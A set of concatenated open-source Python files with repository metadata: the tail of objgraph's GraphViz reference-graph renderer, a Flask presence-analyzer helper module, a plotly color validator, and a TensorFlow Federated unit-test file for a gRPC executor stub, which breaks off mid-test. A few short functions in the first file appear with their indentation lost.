    False

    .. versionadded:: 1.8
    """
    if not inspect.ismodule(obj):
        return False
    registered = sys.modules.get(getattr(obj, '__name__', None))
    return obj is registered
#
# Internal helpers
#
def _find_chain(obj, predicate, edge_func, max_depth=20, extra_ignore=()):
    """Breadth-first search along ``edge_func`` edges starting at ``obj``.

    Returns the chain from the first object satisfying ``predicate`` back
    to ``obj`` (i.e. ``[match, ..., obj]``), or ``[obj]`` if no match is
    found within ``max_depth``.

    NOTE(review): relies on being called exactly one frame below the public
    wrapper (see the ``sys._getframe(1)`` below) -- do not introduce
    intermediate helper calls.
    """
    queue = [obj]
    depth = {id(obj): 0}
    parent = {id(obj): None}
    # Ignore the bookkeeping objects of this very search, so the search
    # doesn't find references that only exist because we're searching.
    ignore = set(extra_ignore)
    ignore.add(id(extra_ignore))
    ignore.add(id(queue))
    ignore.add(id(depth))
    ignore.add(id(parent))
    ignore.add(id(ignore))
    ignore.add(id(sys._getframe()))  # this function
    ignore.add(id(sys._getframe(1)))  # find_chain/find_backref_chain
    gc.collect()
    while queue:
        target = queue.pop(0)
        if predicate(target):
            # Walk the parent links back to ``obj`` to build the chain.
            chain = [target]
            while parent[id(target)] is not None:
                target = parent[id(target)]
                chain.append(target)
            return chain
        tdepth = depth[id(target)]
        if tdepth < max_depth:
            referrers = edge_func(target)
            ignore.add(id(referrers))
            for source in referrers:
                if id(source) in ignore:
                    continue
                if id(source) not in depth:
                    depth[id(source)] = tdepth + 1
                    parent[id(source)] = target
                    queue.append(source)
    return [obj]  # not found
def _show_graph(objs, edge_func, swap_source_target,
                max_depth=3, extra_ignore=(), filter=None, too_many=10,
                highlight=None, filename=None, extra_info=None,
                refcounts=False, shortnames=True, output=None,
                cull_func=None, extra_node_attrs=None):
    """Render a reference graph rooted at ``objs`` as GraphViz .dot output.

    Shared implementation of :func:`show_refs` and :func:`show_backrefs`;
    ``edge_func`` and ``swap_source_target`` select the edge direction,
    ``cull_func`` (if given) stops expansion at matching nodes.

    Output goes to ``output``, ``filename``, an inline IPython graph, or a
    temporary .dot file handed to :func:`_present_graph`, in that order of
    preference.
    """
    if not _isinstance(objs, (list, tuple)):
        objs = [objs]
    # Choose the output sink.
    is_interactive = False
    if filename and output:
        raise ValueError('Cannot specify both output and filename.')
    elif output:
        f = output
    elif filename and filename.endswith('.dot'):
        f = codecs.open(filename, 'w', encoding='utf-8')
        dot_filename = filename
    elif IS_INTERACTIVE and not filename:
        is_interactive = True
        f = StringIO()
    else:
        fd, dot_filename = tempfile.mkstemp(prefix='objgraph-',
                                            suffix='.dot', text=True)
        f = os.fdopen(fd, "w")
        if getattr(f, 'encoding', None):  # pragma: PY3
            # Python 3 will wrap the file in the user's preferred encoding
            # Re-wrap it for utf-8
            import io
            f = io.TextIOWrapper(f.detach(), 'utf-8')
    f.write('digraph ObjectGraph {\n'
            ' node[shape=box, style=filled, fillcolor=white];\n')
    queue = []
    depth = {}
    # Ignore this traversal's own bookkeeping objects and frames, so they
    # don't show up as referrers in the graph.
    ignore = set(extra_ignore)
    ignore.add(id(objs))
    ignore.add(id(extra_ignore))
    ignore.add(id(queue))
    ignore.add(id(depth))
    ignore.add(id(ignore))
    ignore.add(id(sys._getframe()))  # this function
    ignore.add(id(sys._getframe().f_locals))
    ignore.add(id(sys._getframe(1)))  # show_refs/show_backrefs
    ignore.add(id(sys._getframe(1).f_locals))
    for obj in objs:
        f.write(' %s[fontcolor=red];\n' % (_obj_node_id(obj)))
        depth[id(obj)] = 0
        queue.append(obj)
        del obj
    gc.collect()
    # Breadth-first traversal, emitting one node statement per object and
    # one edge statement per reference.
    nodes = 0
    while queue:
        nodes += 1
        # The names "source" and "target" are reversed here because
        # originally there was just show_backrefs() and we were
        # traversing the reference graph backwards.
        target = queue.pop(0)
        tdepth = depth[id(target)]
        f.write(' %s[label="%s"%s];\n' % (_obj_node_id(target),
                                          _obj_label(target, extra_info,
                                                     refcounts, shortnames),
                                          _obj_attrs(target,
                                                     extra_node_attrs)))
        # Node color fades with depth; modules and highlighted nodes get
        # their own hues.
        h, s, v = _gradient((0, 0, 1), (0, 0, .3), tdepth, max_depth)
        if inspect.ismodule(target):
            h = .3
            s = 1
        if highlight and highlight(target):
            h = .6
            s = .6
            v = 0.5 + v * 0.5
        f.write(' %s[fillcolor="%g,%g,%g"];\n'
                % (_obj_node_id(target), h, s, v))
        if v < 0.5:
            f.write(' %s[fontcolor=white];\n' % (_obj_node_id(target)))
        if hasattr(getattr(target, '__class__', None), '__del__'):
            f.write(' %s->%s_has_a_del[color=red,style=dotted,'
                    'len=0.25,weight=10];\n' % (_obj_node_id(target),
                                                _obj_node_id(target)))
            f.write(' %s_has_a_del[label="__del__",shape=doublecircle,'
                    'height=0.25,color=red,fillcolor="0,.5,1",fontsize=6];\n'
                    % (_obj_node_id(target)))
        if tdepth >= max_depth:
            continue
        if cull_func is not None and cull_func(target):
            continue
        neighbours = edge_func(target)
        ignore.add(id(neighbours))
        n = 0
        skipped = 0
        for source in neighbours:
            if id(source) in ignore:
                continue
            if filter and not filter(source):
                continue
            if n >= too_many:
                skipped += 1
                continue
            if swap_source_target:
                srcnode, tgtnode = target, source
            else:
                srcnode, tgtnode = source, target
            elabel = _edge_label(srcnode, tgtnode, shortnames)
            f.write(' %s -> %s%s;\n' % (_obj_node_id(srcnode),
                                        _obj_node_id(tgtnode), elabel))
            if id(source) not in depth:
                depth[id(source)] = tdepth + 1
                queue.append(source)
            n += 1
            del source
        del neighbours
        if skipped > 0:
            # Represent the culled breadth as a single "N more" node.
            h, s, v = _gradient((0, 1, 1), (0, 1, .3), tdepth + 1, max_depth)
            if swap_source_target:
                label = "%d more references" % skipped
                edge = "%s->too_many_%s" % (_obj_node_id(target),
                                            _obj_node_id(target))
            else:
                label = "%d more backreferences" % skipped
                edge = "too_many_%s->%s" % (_obj_node_id(target),
                                            _obj_node_id(target))
            f.write(' %s[color=red,style=dotted,len=0.25,weight=10];\n'
                    % edge)
            f.write(' too_many_%s[label="%s",shape=box,height=0.25,'
                    'color=red,fillcolor="%g,%g,%g",fontsize=6];\n'
                    % (_obj_node_id(target), label, h, s, v))
            f.write(' too_many_%s[fontcolor=white];\n'
                    % (_obj_node_id(target)))
    f.write("}\n")
    if output:
        return
    if is_interactive:
        return graphviz.Source(f.getvalue())
    else:
        # The file should only be closed if this function was in charge of
        # opening the file.
        f.close()
        print("Graph written to %s (%d nodes)" % (dot_filename, nodes))
        _present_graph(dot_filename, filename)
def _present_graph(dot_filename, filename=None):
    """Present a .dot file to the user in the requested fashion.

    If ``filename`` is provided, runs ``dot`` to convert the .dot file
    into the desired format, determined by the filename extension.

    If ``filename`` is not provided, tries to launch ``xdot``, a
    graphical .dot file viewer.  If ``xdot`` is not present on the system,
    converts the graph to a PNG.
    """
    if filename == dot_filename:
        # nothing to do, the user asked for a .dot file and got it
        return
    if not filename and _program_in_path('xdot'):
        print("Spawning graph viewer (xdot)")
        subprocess.Popen(['xdot', dot_filename], close_fds=True)
        return
    if not _program_in_path('dot'):
        if filename:
            print("Image renderer (dot) not found, not doing anything else")
        else:
            print("Graph viewer (xdot) and image renderer (dot) not found,"
                  " not doing anything else")
        return
    if not filename:
        print("Graph viewer (xdot) not found, generating a png instead")
        filename = dot_filename[:-4] + '.png'
    stem, ext = os.path.splitext(filename)
    cmd = ['dot', '-T' + ext[1:], '-o' + filename, dot_filename]
    dot = subprocess.Popen(cmd, close_fds=False)
    dot.wait()
    if dot.returncode != 0:
        # XXX: shouldn't this go to stderr or a log?
        print('dot failed (exit code %d) while executing "%s"'
              % (dot.returncode, ' '.join(cmd)))
    else:
        print("Image generated as %s" % filename)
def _obj_node_id(obj):
return ('o%d' % id(obj)).replace('-', '_')
def _obj_attrs(obj, extra_node_attrs):
    """Format user-supplied graphviz node attributes for ``obj``.

    Returns '' when no ``extra_node_attrs`` callback was given; otherwise
    a leading ", " followed by sorted ``name="value"`` pairs (attributes
    whose value is None are dropped).
    """
    if extra_node_attrs is None:
        return ""
    attrs = extra_node_attrs(obj)
    pairs = ['%s="%s"' % (name, _quote(value))
             for name, value in sorted(iteritems(attrs))
             if value is not None]
    return ", " + ", ".join(pairs)
def _obj_label(obj, extra_info=None, refcounts=False, shortnames=True):
    """Build the multi-line node label for ``obj``, quoted for graphviz."""
    typename = _short_typename(obj) if shortnames else _long_typename(obj)
    if refcounts:
        # Why -4?  To ignore the references coming from
        #   this function's frame (obj),
        #   show_graph's frame (target variable),
        #   sys.getrefcount()'s argument,
        #   and something else that doesn't show up in gc.get_referrers().
        typename += ' [%d]' % (sys.getrefcount(obj) - 4)
    lines = [typename, _safe_repr(obj)]
    if extra_info:
        lines.append(str(extra_info(obj)))
    return _quote('\n'.join(lines))
def _quote(s):
return (s.replace("\\", "\\\\")
.replace("\"", "\\\"")
.replace("\n", "\\n")
.replace("\0", "\\\\0"))
def _get_obj_type(obj):
    """Return the type of ``obj``, unwrapping old-style Python 2 instances."""
    objtype = type(obj)
    if objtype == InstanceType:  # pragma: PY2 -- no old-style classes on PY3
        # Old-style instances all have type InstanceType; the interesting
        # type is the actual class.
        objtype = obj.__class__
    return objtype
def _short_typename(obj):
    """Return the bare class name of ``obj`` (no module prefix)."""
    objtype = _get_obj_type(obj)
    return objtype.__name__
def _long_typename(obj):
    """Return the module-qualified class name of ``obj`` when possible."""
    objtype = _get_obj_type(obj)
    module = getattr(objtype, '__module__', None)
    if not module:
        return objtype.__name__
    return '%s.%s' % (module, objtype.__name__)
def _safe_repr(obj):
    """Return _short_repr(obj), swallowing any exception it may raise."""
    try:
        return _short_repr(obj)
    except Exception:
        # A broken __repr__ must not break graph drawing.
        return '(unrepresentable)'
def _name_or_repr(value):
    """Return ``value.__name__`` if it is a usable string, else a short repr."""
    try:
        name = value.__name__
    except AttributeError:
        return repr(value)[:40]
    if _isinstance(name, basestring):
        return name
    # __name__ exists but isn't a string (e.g. a mock); fall back to repr.
    return repr(value)[:40]
def _short_repr(obj):
    """Return a compact human-readable description of *obj* (<= 40 chars for
    the generic fallback).

    The isinstance checks are ordered from most to least specific; callables
    are summarised by name, containers by length, and everything else by a
    truncated repr().
    """
    if _isinstance(obj, (type, types.ModuleType, types.BuiltinMethodType,
                         types.BuiltinFunctionType)):
        return _name_or_repr(obj)
    if _isinstance(obj, types.MethodType):
        name = _name_or_repr(obj.__func__)
        if obj.__self__:
            return name + ' (bound)'
        else:  # pragma: PY2 -- no unbound methods on Python 3
            return name
    # NB: types.LambdaType is an alias for types.FunctionType!
    # Only genuine lambdas (named '<lambda>') get the file:line form.
    if _isinstance(obj, types.LambdaType) and obj.__name__ == '<lambda>':
        return 'lambda: %s:%s' % (os.path.basename(obj.__code__.co_filename),
                                  obj.__code__.co_firstlineno)
    if _isinstance(obj, types.FrameType):
        return '%s:%s' % (obj.f_code.co_filename, obj.f_lineno)
    if _isinstance(obj, (tuple, list, dict, set)):
        return '%d items' % len(obj)
    return repr(obj)[:40]
def _gradient(start_color, end_color, depth, max_depth):
if max_depth == 0:
# avoid division by zero
return start_color
h1, s1, v1 = start_color
h2, s2, v2 = end_color
f = float(depth) / max_depth
h = h1 * (1-f) + h2 * f
s = s1 * (1-f) + s2 * f
v = v1 * (1-f) + v2 * f
return h, s, v
def _edge_label(source, target, shortnames=True):
    """Return a graphviz edge attribute string describing how *source*
    refers to *target*, or '' when no informative label can be found.

    Checks run from most to least specific; structural references
    (__dict__, frame/method internals) get weight=10 to keep related nodes
    close together in the layout.
    """
    if (_isinstance(target, dict)
        and target is getattr(source, '__dict__', None)):
        return ' [label="__dict__",weight=10]'
    if _isinstance(source, types.FrameType):
        if target is source.f_locals:
            return ' [label="f_locals",weight=10]'
        if target is source.f_globals:
            return ' [label="f_globals",weight=10]'
    if _isinstance(source, types.MethodType):
        try:
            if target is source.__self__:
                return ' [label="__self__",weight=10]'
            if target is source.__func__:
                return ' [label="__func__",weight=10]'
        except AttributeError:  # pragma: nocover
            # Python < 2.6 compatibility
            if target is source.im_self:
                return ' [label="im_self",weight=10]'
            if target is source.im_func:
                return ' [label="im_func",weight=10]'
    if _isinstance(source, types.FunctionType):
        # Label the edge with whichever function attribute holds target.
        for k in dir(source):
            if target is getattr(source, k):
                return ' [label="%s",weight=10]' % _quote(k)
    if _isinstance(source, dict):
        for k, v in iteritems(source):
            if v is target:
                # Identifier-like string keys become plain labels; other
                # key types are shown as "TypeName\nrepr".
                if _isinstance(k, basestring) and _is_identifier(k):
                    return ' [label="%s",weight=2]' % _quote(k)
                else:
                    if shortnames:
                        tn = _short_typename(k)
                    else:
                        tn = _long_typename(k)
                    return ' [label="%s"]' % _quote(tn + "\n" + _safe_repr(k))
    return ''
# Matcher for ASCII identifier-like strings; used by _edge_label to decide
# whether a dict key can be shown as a bare edge label.
_is_identifier = re.compile('[a-zA-Z_][a-zA-Z_0-9]*$').match
def _program_in_path(program):
# XXX: Consider using distutils.spawn.find_executable or shutil.which
path = os.environ.get("PATH", os.defpath).split(os.pathsep)
path = [os.path.join(dir, program) for dir in path]
path = [True for file in path
if os.path.isfile(file) or os.path.isfile(file + '.exe')]
return bool(path)
| {
"content_hash": "ec10514dbef81b5efdc566235f2da942",
"timestamp": "",
"source": "github",
"line_count": 1259,
"max_line_length": 79,
"avg_line_length": 34.5758538522637,
"alnum_prop": 0.5882015115664698,
"repo_name": "mgedmin/objgraph",
"id": "6c2c9417bb79e044fdcdcd862260a58bf649f1cd",
"size": "43531",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "objgraph.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "8958"
},
{
"name": "Python",
"bytes": "70810"
}
],
"symlink_target": ""
} |
"""
Helper functions used in views.
"""
import calendar
import csv
import logging
import time
import locale
from datetime import datetime
from flask import Response
from functools import wraps
from json import dumps
from threading import Lock
from presence_analyzer.main import APP
# Collation locale used for sorting user names (see parse_tree); requires
# the pl_PL.utf8 locale to be installed on the host.
locale.setlocale(locale.LC_COLLATE, 'pl_PL.utf8')
# Module-level cache shared by every function decorated with @memoize.
CACHE_STORAGE = {}
LOG = logging.getLogger(__name__)
def jsonify(function):
    """
    Creates a response with the JSON representation of wrapped function result.
    """
    @wraps(function)
    def inner(*args, **kwargs):
        """
        This docstring will be overridden by @wraps decorator.
        """
        payload = dumps(function(*args, **kwargs))
        return Response(payload, mimetype='application/json')
    return inner
def memoize(duration_time):
    """
    Cache function response for a given amount of time in seconds.

    Entries live in the module-level CACHE_STORAGE dict and are replaced
    (not evicted) once older than *duration_time*.  A single lock per
    decorated function serialises both the cache lookup and the wrapped
    call itself.
    """
    lock = Lock()
    def _memoize(function):
        """
        This docstring will be overridden.
        """
        @wraps(function)
        def __memoize(*args, **kwargs):
            """
            This docstring will be overridden by @wraps decorator.
            """
            # Cache key combines the function name, str() of positional
            # args and hash() of keyword values.  NOTE(review): kwarg
            # values must be hashable, and on interpreters without ordered
            # dicts (< 3.7) equivalent calls could produce differently
            # ordered keys -- TODO confirm callers only use positional args.
            f_name = function.__name__
            arguments = [str(arg) for arg in args]
            kwarguments = [
                '%s:%s' % (key, hash(value)) for key, value in kwargs.items()
            ]
            time_now = int(time.time())
            key = '{}{}{}'.format(f_name, arguments, kwarguments)
            with lock:
                if (key in CACHE_STORAGE and
                        time_now - CACHE_STORAGE[key]['time'] < duration_time):
                    return CACHE_STORAGE[key]['value']
                value = function(*args, **kwargs)
                CACHE_STORAGE[key] = {
                    'time': time_now,
                    'value': value
                }
                return value
        return __memoize
    return _memoize
@memoize(600)
def get_data():
    """
    Extracts presence data from CSV file and groups it by user_id.

    It creates structure like this:
    data = {
        'user_id': {
            datetime.date(2013, 10, 1): {
                'start': datetime.time(9, 0, 0),
                'end': datetime.time(17, 30, 0),
            },
            datetime.date(2013, 10, 2): {
                'start': datetime.time(8, 30, 0),
                'end': datetime.time(16, 45, 0),
            },
        }
    }

    Rows that do not have exactly 4 fields or fail to parse are skipped
    (parse failures are logged at debug level).
    """
    data = {}
    with open(APP.config['DATA_CSV'], 'r') as csvfile:
        presence_reader = csv.reader(csvfile, delimiter=',')
        for i, row in enumerate(presence_reader):
            if len(row) != 4:
                # ignore header and footer lines
                continue
            try:
                user_id = int(row[0])
                date = datetime.strptime(row[1], '%Y-%m-%d').date()
                start = datetime.strptime(row[2], '%H:%M:%S').time()
                end = datetime.strptime(row[3], '%H:%M:%S').time()
            except (ValueError, TypeError):
                LOG.debug('Problem with line %d: ', i, exc_info=True)
                # BUG FIX: previously execution fell through after logging,
                # storing the *previous* row's values under a half-parsed
                # key (or raising NameError on the first malformed row).
                continue
            data.setdefault(user_id, {})[date] = {'start': start, 'end': end}
    return data
def group_by_weekday(items):
    """
    Groups presence entries by weekday (0 = Monday .. 6 = Sunday).

    Returns a list of seven lists of presence intervals in seconds.
    """
    result = [[] for _ in range(7)]
    for date, presence in items.items():
        result[date.weekday()].append(
            interval(presence['start'], presence['end']))
    return result
def seconds_since_midnight(time_data):
    """
    Calculates amount of seconds between midnight and *time_data*.
    """
    hours_part = time_data.hour * 3600
    minutes_part = time_data.minute * 60
    return hours_part + minutes_part + time_data.second
def interval(start, end):
    """
    Calculates interval in seconds between two datetime.time objects.
    """
    start_seconds = seconds_since_midnight(start)
    end_seconds = seconds_since_midnight(end)
    return end_seconds - start_seconds
def mean(items):
    """
    Calculates arithmetic mean. Returns zero for empty lists.
    """
    if not items:
        return 0
    return float(sum(items)) / len(items)
def mean_presence_hours(items):
    """
    Calculate start and end of presence time of given user grouped by weekday.

    Returns a list of [weekday abbreviation, mean start, mean end] rows,
    where the means are in seconds since midnight.

    NOTE: Python 2 only (xrange, dict.iteritems).  Row order follows the
    iteration order of the `week` dict -- presumably 0..6 for small int
    keys on CPython 2, TODO confirm before relying on ordering.
    """
    week = {i: {'start': [], 'end': []} for i in xrange(7)}
    for day in items:
        week[day.weekday()]['start'].append(
            seconds_since_midnight(items[day]['start'])
        )
        week[day.weekday()]['end'].append(
            seconds_since_midnight(items[day]['end'])
        )
    return [
        [calendar.day_abbr[k], mean(v['start']), mean(v['end'])]
        for k, v in week.iteritems()
    ]
def parse_tree(root):
    """
    Parsing xml root.

    *root* is an ElementTree-like object (it must support getroot()) whose
    document contains a <server> element with protocol/host/port children
    and a <users> element with <user id=...> entries holding <name> and
    <avatar> children.  Returns user dicts sorted by name using the
    module-level Polish collation.

    NOTE: the `cmp=` keyword of sorted() exists only on Python 2.
    """
    server = {item.tag: item.text for item in root.getroot().find('server')}
    # Base URL used to make the relative avatar paths absolute.
    url = '{}://{}:{}'.format(
        server['protocol'],
        server['host'],
        server['port']
    )
    users_from_xml = root.getroot().find('users')
    return sorted([
        {
            'user_id': int(user.get('id')),
            'name': user.find('name').text,
            'avatar': '{}{}'.format(url, user.find('avatar').text)
        }
        for user in users_from_xml
    ], key=lambda user: user['name'], cmp=locale.strcoll)
def get_all_days():
    """
    Get list of all day dates from data.

    Returns a dict mapping an integer day key (yymmdd) to the display
    string (dd.mm.yy).
    """
    data = get_data()
    # NOTE: the previous version pre-assigned `days = {}` and guarded the
    # comprehension with `not in days`, but that tested membership in the
    # *empty* dict (the comprehension is evaluated before rebinding), so
    # the guard was a no-op.  Duplicate days collapse naturally because
    # they produce the same key.
    return {
        int(day.strftime('%y%m%d')): day.strftime('%d.%m.%y')
        for user_days in data.values()
        for day in user_days
    }
def get_employees(given_date):
    """
    Get list of employees that have been working at given date.

    *given_date* is a yymmdd value (int or str); the result maps user id
    to presence time in seconds for that day.
    """
    data = get_data()
    target_date = datetime.strptime(str(given_date), "%y%m%d").date()
    employees = {}
    for user, days in data.items():
        if target_date in days:
            presence = days[target_date]
            employees[user] = interval(presence['start'], presence['end'])
    return employees
| {
"content_hash": "552cd1ef17b2c97c0384d2cf717dfc65",
"timestamp": "",
"source": "github",
"line_count": 214,
"max_line_length": 79,
"avg_line_length": 27.83177570093458,
"alnum_prop": 0.537441235728677,
"repo_name": "stxnext-kindergarten/presence-analyzer-gderdak",
"id": "5ae45c814ded50f0a51088aa6721684b6bb2ab00",
"size": "5980",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/presence_analyzer/utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "990"
},
{
"name": "HTML",
"bytes": "9776"
},
{
"name": "Python",
"bytes": "31643"
}
],
"symlink_target": ""
} |
import _plotly_utils.basevalidators
class BgcolorValidator(_plotly_utils.basevalidators.ColorValidator):
    """Validator for the ``histogram.hoverlabel.bgcolor`` property."""

    def __init__(
        self, plotly_name="bgcolor", parent_name="histogram.hoverlabel", **kwargs
    ):
        # Pull overridable defaults out of kwargs before delegating.
        array_ok = kwargs.pop("array_ok", True)
        edit_type = kwargs.pop("edit_type", "none")
        role = kwargs.pop("role", "style")
        super(BgcolorValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            array_ok=array_ok,
            edit_type=edit_type,
            role=role,
            **kwargs
        )
| {
"content_hash": "f876b2c149a3bea9077ad4f5557bfc4b",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 81,
"avg_line_length": 34.6,
"alnum_prop": 0.5915221579961464,
"repo_name": "plotly/python-api",
"id": "0295abca82b3f62a6188071d1281ef13bf7cb937",
"size": "519",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/histogram/hoverlabel/_bgcolor.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "6870"
},
{
"name": "Makefile",
"bytes": "1708"
},
{
"name": "Python",
"bytes": "823245"
},
{
"name": "Shell",
"bytes": "3238"
}
],
"symlink_target": ""
} |
"""Tests for remote_executor_grpc_stub."""
from unittest import mock
from absl.testing import absltest
import grpc
import portpicker
import tensorflow as tf
from google.protobuf import any_pb2
from tensorflow_federated.proto.v0 import executor_pb2
from tensorflow_federated.proto.v0 import executor_pb2_grpc
from tensorflow_federated.python.core.impl.executors import executors_errors
from tensorflow_federated.python.core.impl.executors import remote_executor_grpc_stub
from tensorflow_federated.python.core.impl.executors import value_serialization
def create_stub():
  """Builds a RemoteExecutorGrpcStub over an insecure channel on a free port."""
  port = portpicker.pick_unused_port()
  target = 'localhost:{}'.format(port)
  channel = grpc.insecure_channel(target)
  return remote_executor_grpc_stub.RemoteExecutorGrpcStub(channel)
def _raise_grpc_error(code):
  """Raises a grpc.RpcError whose code() returns the given status code."""
  error = grpc.RpcError()
  error.code = lambda: code
  raise error


def _raise_grpc_error_unavailable(*args):
  """Mock side-effect: raises a retryable (UNAVAILABLE) gRPC error."""
  del args  # Unused
  _raise_grpc_error(grpc.StatusCode.UNAVAILABLE)


def _raise_non_retryable_grpc_error(*args):
  """Mock side-effect: raises a non-retryable (ABORTED) gRPC error."""
  del args  # Unused
  _raise_grpc_error(grpc.StatusCode.ABORTED)
class GrpcConnectivityTest(absltest.TestCase):
  """Verifies that the stub reports readiness from channel connectivity."""

  def fake_channel_subscribe(self, callback, try_to_connect=True):
    # Simulate gRPC invoking the subscription callback with READY as soon
    # as a connection attempt is requested.
    if try_to_connect:
      callback(grpc.ChannelConnectivity.READY)

  def test_grpc_connectivity(self):
    channel = mock.create_autospec(grpc.Channel, instance=True)
    channel.subscribe.side_effect = self.fake_channel_subscribe
    stub = remote_executor_grpc_stub.RemoteExecutorGrpcStub(channel)
    self.assertTrue(stub.is_ready)
@mock.patch.object(executor_pb2_grpc, 'ExecutorGroupStub')
class RemoteExecutorGrpcStubTest(absltest.TestCase):
  """Tests each stub method against a mocked ExecutorGroupStub.

  The class-level mock.patch.object decorator injects the patched gRPC stub
  class as the last positional argument of every test method.  Each stub
  method is exercised for three outcomes: a successful response,
  translation of UNAVAILABLE into executors_errors.RetryableError, and
  re-raising of non-retryable gRPC errors (plus TypeError passthrough).
  """

  def test_compute_returns_result(self, mock_executor_grpc_stub):
    tensor_proto = tf.make_tensor_proto(1)
    any_pb = any_pb2.Any()
    any_pb.Pack(tensor_proto)
    value = executor_pb2.Value(tensor=any_pb)
    response = executor_pb2.ComputeResponse(value=value)
    instance = mock_executor_grpc_stub.return_value
    instance.Compute = mock.Mock(side_effect=[response])
    request = executor_pb2.ComputeRequest(
        executor=executor_pb2.ExecutorId(), value_ref=executor_pb2.ValueRef())
    stub = create_stub()
    result = stub.compute(request)
    instance.Compute.assert_called_once()
    value, _ = value_serialization.deserialize_value(result.value)
    self.assertEqual(value, 1)

  def test_compute_raises_retryable_error_on_grpc_error_unavailable(
      self, mock_executor_grpc_stub):
    instance = mock_executor_grpc_stub.return_value
    instance.Compute = mock.Mock(side_effect=_raise_grpc_error_unavailable)
    stub = create_stub()
    with self.assertRaises(executors_errors.RetryableError):
      stub.compute(
          executor_pb2.ComputeRequest(value_ref=executor_pb2.ValueRef()))

  # NOTE: parameter named `grpc_stub` here, unlike the other tests'
  # `mock_executor_grpc_stub`; it is the same injected mock.
  def test_compute_reraises_grpc_error(self, grpc_stub):
    instance = grpc_stub.return_value
    instance.Compute = mock.Mock(side_effect=_raise_non_retryable_grpc_error)
    stub = create_stub()
    request = executor_pb2.ComputeRequest(
        executor=executor_pb2.ExecutorId(), value_ref=executor_pb2.ValueRef())
    with self.assertRaises(grpc.RpcError) as context:
      stub.compute(request)
    self.assertEqual(context.exception.code(), grpc.StatusCode.ABORTED)

  def test_get_executor(self, mock_executor_grpc_stub):
    response = executor_pb2.GetExecutorResponse()
    instance = mock_executor_grpc_stub.return_value
    instance.GetExecutor = mock.Mock(side_effect=[response])
    stub = create_stub()
    result = stub.get_executor(request=executor_pb2.GetExecutorRequest())
    self.assertEqual(result, response)

  def test_create_value_returns_value(self, mock_executor_grpc_stub):
    response = executor_pb2.CreateValueResponse()
    instance = mock_executor_grpc_stub.return_value
    instance.CreateValue = mock.Mock(side_effect=[response])
    stub = create_stub()
    result = stub.create_value(request=executor_pb2.CreateValueRequest())
    self.assertEqual(result, response)

  def test_create_value_raises_retryable_error_on_grpc_error_unavailable(
      self, mock_executor_grpc_stub):
    instance = mock_executor_grpc_stub.return_value
    instance.CreateValue = mock.Mock(side_effect=_raise_grpc_error_unavailable)
    stub = create_stub()
    with self.assertRaises(executors_errors.RetryableError):
      stub.create_value(request=executor_pb2.CreateValueRequest())

  def test_create_value_reraises_grpc_error(self, mock_executor_grpc_stub):
    instance = mock_executor_grpc_stub.return_value
    instance.CreateValue = mock.Mock(
        side_effect=_raise_non_retryable_grpc_error)
    stub = create_stub()
    with self.assertRaises(grpc.RpcError) as context:
      stub.create_value(request=executor_pb2.CreateValueRequest())
    self.assertEqual(context.exception.code(), grpc.StatusCode.ABORTED)

  def test_create_value_reraises_type_error(self, mock_executor_grpc_stub):
    instance = mock_executor_grpc_stub.return_value
    instance.CreateValue = mock.Mock(side_effect=TypeError)
    stub = create_stub()
    with self.assertRaises(TypeError):
      stub.create_value(request=executor_pb2.CreateValueRequest())

  def test_create_call_returns_remote_value(self, mock_executor_grpc_stub):
    response = executor_pb2.CreateCallResponse()
    instance = mock_executor_grpc_stub.return_value
    instance.CreateCall = mock.Mock(side_effect=[response])
    stub = create_stub()
    result = stub.create_call(request=executor_pb2.CreateCallRequest())
    instance.CreateCall.assert_called_once()
    self.assertEqual(result, response)

  def test_create_call_raises_retryable_error_on_grpc_error_unavailable(
      self, mock_executor_grpc_stub):
    instance = mock_executor_grpc_stub.return_value
    instance.CreateCall = mock.Mock(side_effect=_raise_grpc_error_unavailable)
    stub = create_stub()
    with self.assertRaises(executors_errors.RetryableError):
      stub.create_call(request=executor_pb2.CreateCallRequest())

  def test_create_call_reraises_grpc_error(self, mock_executor_grpc_stub):
    instance = mock_executor_grpc_stub.return_value
    instance.CreateCall = mock.Mock(side_effect=_raise_non_retryable_grpc_error)
    stub = create_stub()
    with self.assertRaises(grpc.RpcError) as context:
      stub.create_call(request=executor_pb2.CreateCallRequest())
    self.assertEqual(context.exception.code(), grpc.StatusCode.ABORTED)

  def test_create_call_reraises_type_error(self, mock_executor_grpc_stub):
    instance = mock_executor_grpc_stub.return_value
    instance.CreateCall = mock.Mock(side_effect=TypeError)
    stub = create_stub()
    with self.assertRaises(TypeError):
      stub.create_call(request=executor_pb2.CreateCallRequest())

  def test_create_struct_returns_value(self, mock_executor_grpc_stub):
    response = executor_pb2.CreateStructResponse()
    instance = mock_executor_grpc_stub.return_value
    instance.CreateStruct = mock.Mock(side_effect=[response])
    stub = create_stub()
    result = stub.create_struct(request=executor_pb2.CreateStructRequest())
    instance.CreateStruct.assert_called_once()
    self.assertEqual(result, response)

  def test_create_struct_raises_retryable_error_on_grpc_error_unavailable(
      self, mock_executor_grpc_stub):
    instance = mock_executor_grpc_stub.return_value
    instance.CreateStruct = mock.Mock(side_effect=_raise_grpc_error_unavailable)
    stub = create_stub()
    with self.assertRaises(executors_errors.RetryableError):
      stub.create_struct(request=executor_pb2.CreateStructRequest())

  def test_create_struct_reraises_grpc_error(self, mock_executor_grpc_stub):
    instance = mock_executor_grpc_stub.return_value
    instance.CreateStruct = mock.Mock(
        side_effect=_raise_non_retryable_grpc_error)
    stub = create_stub()
    with self.assertRaises(grpc.RpcError) as context:
      stub.create_struct(request=executor_pb2.CreateStructRequest())
    self.assertEqual(context.exception.code(), grpc.StatusCode.ABORTED)

  def test_create_struct_reraises_type_error(self, mock_executor_grpc_stub):
    instance = mock_executor_grpc_stub.return_value
    instance.CreateStruct = mock.Mock(side_effect=TypeError)
    stub = create_stub()
    with self.assertRaises(TypeError):
      stub.create_struct(request=executor_pb2.CreateStructRequest())

  def test_create_selection_returns_value(self, mock_executor_grpc_stub):
    response = executor_pb2.CreateSelectionResponse()
    instance = mock_executor_grpc_stub.return_value
    instance.CreateSelection = mock.Mock(side_effect=[response])
